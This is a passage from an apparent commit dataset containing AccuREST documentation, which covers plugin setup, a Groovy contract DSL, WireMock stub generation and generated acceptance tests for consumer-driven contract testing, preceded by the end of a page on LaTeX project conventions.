","old_contents":"== Conventions in this repository\n\nAs a good software engineer, you avoid work where you can, certainly if it is repetitious. Your computer does a much better job at that.\nYou can even minimize configuration labor when you\nstick to some conventions and use them as in 'convention over configuration'.\n\nThe conventions we use are:\n\n* The output format is always pdf.\n* For every separate target document (pdf-file) there is a separate project, which is contained in a directory of its own.\n* The document that is given as tex-source command line parameter is called `main.tex`.\n* This main.tex file defines the document type, and has a fixed content, which only varies by document-type, like *sebireport* for reports, *sebiarticle* for articles and *sebisheets* for sheets.\n* The actual content is organised in a file called `material.tex`, which `\\input`s or `\\include`s the files that make up the final content.\n\n.main.tex file content\n[source,tex-source]\n----\n\\input{sebireport}\n\\begin{document}\n\\input{material}\n\\end{document}\n----\n\n.material.tex file content (typical)\n[source,tex-source]\n----\n\\input{frontmatter}\n\\input{summary}\n\\numbering{arabic}\n\\input{introduction}\n\\input{chap1}\n\\input{chap1}\n----\n","returncode":0,"stderr":"","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"e0687be6dca4caa3de30c10213d55f2277db965d","subject":"maven fixes","message":"maven fixes\n","repos":"spring-cloud\/spring-cloud-contract,dstepanov\/accurest,Codearte\/accurest,spring-cloud\/spring-cloud-contract,pfrank13\/spring-cloud-contract,dstepanov\/accurest,spring-cloud\/spring-cloud-contract,pfrank13\/spring-cloud-contract,Codearte\/accurest","old_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_contents":":github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease proceed to the Introduction section to start your journey with Consumer Driven Contracts on the JVM.\n\n# 1. Introduction\n\nTo make a long story short: AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It ships with a __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce the following resources:\n\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand; test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if the server-side implementation of the API is compliant with the contract (__server tests__). The full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) do exactly what the actual server-side implementation will do,\n - to promote the ATDD method and the microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code to be used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta**. Of course the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta**. 
Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: https:\/\/github.com\/Codearte\/accurest-maven-plugin[accurest-maven-plugin]\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. 
By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from the Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported, with Spock being the default framework\n\n## Base class for tests\n\nWhen using Accurest in the default MockMvc mode you need to create a base specification for all generated acceptance tests. In this class you need to point to the endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use the base class to initialize the whole tested app, similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain a `protected WebTarget webTarget` field; right now the only option to test a JAX-RS API is to start a web server.\n
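\nFor `Explicit` mode, the base class could boot the application for real and point the tests at it. A minimal sketch, assuming a Spring Boot application class `Application` (hypothetical), rest-assured on the classpath, and an illustrative fixed port:\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport com.jayway.restassured.RestAssured\nimport org.springframework.boot.test.IntegrationTest\nimport org.springframework.boot.test.SpringApplicationContextLoader\nimport org.springframework.test.context.ContextConfiguration\nimport org.springframework.test.context.web.WebAppConfiguration\nimport spock.lang.Specification\n\n\/\/ Boots the whole app on a fixed port and points rest-assured at it.\n\/\/ Application and the port value are illustrative assumptions.\n@ContextConfiguration(classes = Application, loader = SpringApplicationContextLoader)\n@WebAppConfiguration\n@IntegrationTest(\"server.port=8081\")\nclass ExplicitBaseSpec extends Specification {\n def setup() {\n RestAssured.baseURI = 'http:\/\/localhost'\n RestAssured.port = 8081\n }\n}\n----\n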
\n## Invoking generated tests\n\nTo ensure that the provider side is compliant with the defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn the consumer service you need to configure the Accurest plugin in exactly the same way as in case of the provider. You need to copy the contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using the `.\/gradlew generateWireMockClientStubs` command. Note that the `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath, LoanApplication makes a call to the FraudDetection service. This request is handled by a Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: https:\/\/github.com\/Codearte\/accurest-maven-plugin[accurest-maven-plugin]\n\n## Add stubs\n\nBy default Accurest looks for stubs in the `src\/test\/accurest` directory.\nThe directory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory, which will be used as the test class name. If there is more than one level of nested directories, all except the last one will be used as the package name.\nSo with the following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n
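\nIf the definitions are nested deeper, the extra directories become the package part. For instance, with a hypothetical layout\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/com\/ofg\/myservice\/shouldCreateUser.groovy\n----\n\nthe test class should end up as `defaultBasePackage.com.ofg.MyService`, with `com.ofg` contributed as a subpackage (an illustration of the rule above, not an example taken from the original docs).\n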
\n## Run plugin\n\nThe plugin goal `generateTests` is assigned to be invoked in the phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests, please invoke the `generateTests` goal.\n\n## Configure plugin\n\nTo change the default configuration, just add a `configuration` section to the plugin definition or the `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines the mode for acceptance tests. By default `MockMvc`, which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies the base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies a Rule which should be added to the generated test classes.\n - **baseClassForTests** - the base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from the Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from the Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported, with Spock being the default framework\n\n## Base class for tests\n\nWhen using Accurest in the default MockMvc mode you need to create a base specification for all generated acceptance tests. In this class you need to point to the endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use the base class to initialize the whole tested app, similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain a `protected WebTarget webTarget` field; right now the only option to test a JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nThe Accurest Maven Plugin generates verification code into the directory `\/generated-test-sources\/accurest` and attaches this directory to the `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that the provider side is compliant with the defined contracts, you need to invoke `mvn generateTests test`\n\n## Accurest on consumer side\n\nIn the consumer service you need to configure the Accurest plugin in exactly the same way as in case of the provider. You need to copy the contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using the `mvn generateStubs` command. By default the generated WireMock mapping is stored in the directory `target\/mappings`. Your project should create from these generated mappings an additional artifact with classifier `stubs` for easy deployment to a maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath, LoanApplication makes a call to the FraudDetection service. This request is handled by a Wiremock server configured using stubs generated by Accurest.\n\n# 3. Contract DSL\n\nThe Contract DSL in AccuREST is written in Groovy, but don't be alarmed if you haven't used Groovy before. Knowledge of the language is not really needed, as our DSL uses only a tiny subset of it (namely literals, method calls and closures). What's more, AccuREST's DSL is designed to be programmer-readable without any knowledge of the DSL itself.\n\nLet's look at a full example of a contract definition.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'POST'\n urlPath('\/users') {\n queryParameters {\n parameter 'limit': 100\n parameter 'offset': containing(\"1\")\n parameter 'filter': \"email\"\n }\n }\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n response {\n status 200\n headers {\n header 'Location': '\/users\/john'\n }\n }\n}\n----\n\nNot all features of the DSL are used in the example above. If you didn't find what you are looking for, please check the next paragraphs on this page.\n\n> You can easily compile Accurest Contracts to WireMock stubs mapping using the standalone maven command: `mvn io.codearte.accurest:accurest-maven-plugin:convert`.\n
\n## Top-Level Elements\n\nThe following methods can be called in the top-level closure of a contract definition. Request and response are mandatory; priority is optional.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n \/\/ Definition of HTTP request part of the contract\n \/\/ (this can be a valid request or invalid depending\n \/\/ on type of contract being specified).\n request {\n ...\n }\n\n \/\/ Definition of HTTP response part of the contract\n \/\/ (a service implementing this contract should respond\n \/\/ with following response after receiving request\n \/\/ specified in \"request\" part above).\n response {\n ...\n }\n\n \/\/ Contract priority, which can be used for overriding\n \/\/ contracts (1 is highest). Priority is optional.\n priority 1\n}\n----\n
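\nPutting the three elements together, a minimal complete definition could look as follows (a sketch; the endpoint and payload are illustrative):\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'GET'\n urlPath('\/status')\n }\n response {\n status 200\n body '''{ \"status\" : \"UP\" }'''\n }\n}\n----\n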
\n## Request\n\nThe HTTP protocol requires only the **method and address** to be specified in a request. The same information is mandatory in the request definition of an AccuREST contract.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n \/\/ HTTP request method (GET\/POST\/PUT\/DELETE).\n method 'GET'\n\n \/\/ Path component of request URL is specified as follows.\n urlPath('\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nIt is possible to specify the whole `url` instead of just the path, but `urlPath` is the recommended way as it makes the tests **host-independent**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'GET'\n\n \/\/ Specifying `url` and `urlPath` in one contract is illegal.\n url('http:\/\/localhost:8888\/users')\n }\n\n response {\n ...\n }\n}\n----\n\nA request may contain **query parameters**, which are specified in a closure nested in a call to `urlPath` or `url`.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n urlPath('\/users') {\n\n \/\/ Each parameter is specified in form\n \/\/ `'paramName' : paramValue` where parameter value\n \/\/ may be a simple literal or one of matcher functions,\n \/\/ all of which are used in this example.\n queryParameters {\n\n \/\/ If a simple literal is used as value\n \/\/ default matcher function is used (equalTo)\n parameter 'limit': 100\n\n \/\/ `equalTo` function simply compares passed value\n \/\/ using identity operator (==).\n parameter 'filter': equalTo(\"email\")\n\n \/\/ `containing` function matches strings\n \/\/ that contain the passed substring.\n parameter 'gender': containing(\"[mf]\")\n\n \/\/ `matching` function tests parameter\n \/\/ against passed regular expression.\n parameter 'offset': matching(\"[0-9]+\")\n\n \/\/ `notMatching` function tests if parameter\n \/\/ does not match passed regular expression.\n parameter 'loginStartsWith': notMatching(\".{0,2}\")\n }\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\nIt may contain additional **request headers**...\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ Each header is added in form `'Header-Name' : 'Header-Value'`.\n headers {\n header 'Content-Type': 'application\/json'\n }\n\n ...\n }\n\n response {\n ...\n }\n}\n----\n\n...and a **request body**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ JSON and XML formats of request body are supported.\n \/\/ Format will be determined from a header or body's content.\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n\n response {\n ...\n }\n}\n----\n\nThe **body's format** can also be specified explicitly by invoking one of the format functions.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n\n \/\/ In this case body will be formatted as XML.\n body equalToXml(\n '''<user><login>john<\/login><name>John The Contract<\/name><\/user>'''\n )\n }\n\n response {\n ...\n }\n}\n----\n\n## Response\n\nA minimal response must contain an **HTTP status code**.\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n \/\/ Status code sent by the server\n \/\/ in response to request specified above.\n status 200\n }\n}\n----\n\nBesides the status, a response may contain **headers** and a **body**, which are specified the same way as in the request (see the previous paragraph).\n
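\nFor instance, a response carrying both, in a sketch mirroring the request-side syntax above:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n ...\n }\n response {\n status 200\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''{ \"login\" : \"john\", \"name\": \"John The Contract\" }'''\n }\n}\n----\n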
\n## Regular expressions\n\nYou can use regular expressions to write your requests in the Contract DSL. It is particularly useful when you want to indicate that a given response should be provided for requests that follow a given pattern. Also, you can use it when you need to use patterns and not exact values both for your tests and your server-side tests.\n\nPlease see the example below:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl groovyDsl = GroovyDsl.make {\n request {\n method('GET')\n url $(client(~\/\\\/[0-9]{2}\/), server('\/12'))\n }\n response {\n status 200\n body(\n id: value(\n client('123'),\n server(regex('[0-9]+'))\n ),\n surname: $(\n client('Kowalsky'),\n server('Lewandowski')\n ),\n name: 'Jan',\n created: $(client('2014-02-02 12:23:43'), server({ currentDate(it) })),\n correlationId: value(client('5d1f9fef-e0dc-4f3d-a7e4-72d2220dd827'),\n server(regex('[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}'))\n )\n )\n headers {\n header 'Content-Type': 'text\/plain'\n }\n }\n}\n----\n\n## Passing optional parameters\n\nIt is possible to provide optional parameters in your contract. It's only possible to have optional parameters for the:\n\n- __STUB__ side of the Request\n- __TEST__ side of the Response\n\nExample:\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n priority 1\n request {\n method 'POST'\n url '\/users\/password'\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n email: $(stub(optional(regex(email()))), test('abc@abc.com')),\n callback_url: $(stub(regex(hostname())), test('http:\/\/partners.com'))\n )\n }\n response {\n status 404\n headers {\n header 'Content-Type': 'application\/json'\n }\n body(\n code: value(stub(\"123123\"), test(optional(\"123123\"))),\n message: \"User not found by email = [${value(test(regex(email())), stub('not.existing@user.com'))}]\"\n )\n }\n}\n----\n\nBy wrapping a part of the body with the `optional()` method you are in fact creating a regular expression that should be present 0 or more times.\n\nThat way for the example above the following test would be generated:\n\n[source,groovy,indent=0]\n----\n given:\n def request = given()\n .header('Content-Type', 'application\/json')\n .body('{\"email\":\"abc@abc.com\",\"callback_url\":\"http:\/\/partners.com\"}')\n\n when:\n def response = given().spec(request)\n .post(\"\/users\/password\")\n\n then:\n response.statusCode == 404\n response.header('Content-Type') == 'application\/json'\n and:\n DocumentContext parsedJson = JsonPath.parse(response.body.asString())\n !parsedJson.read('''$[?(@.code =~ \/(123123)?\/)]''', JSONArray).empty\n !parsedJson.read('''$[?(@.message =~ \/User not found by email = \\\\[[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4}\\\\]\/)]''', JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\n\nIt is also 
possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. 
Server Side\n\nBeing service Y, since you are developing your stub you need to be sure that it actually resembles your\nconcrete implementation. You cannot have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why acceptance tests are generated from the provided stub; they ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as the request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to a proper naming convention while creating your contracts. The convention requires including an order number followed by an underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch a tree will cause Accurest to generate a WireMock scenario with the name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\n\nMore details about Wiremock scenarios can be found under http:\/\/wiremock.org\/stateful-behaviour.html\n\nAccurest will also generate tests with a guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was how to pass the generated WireMock JSON stubs from the server side 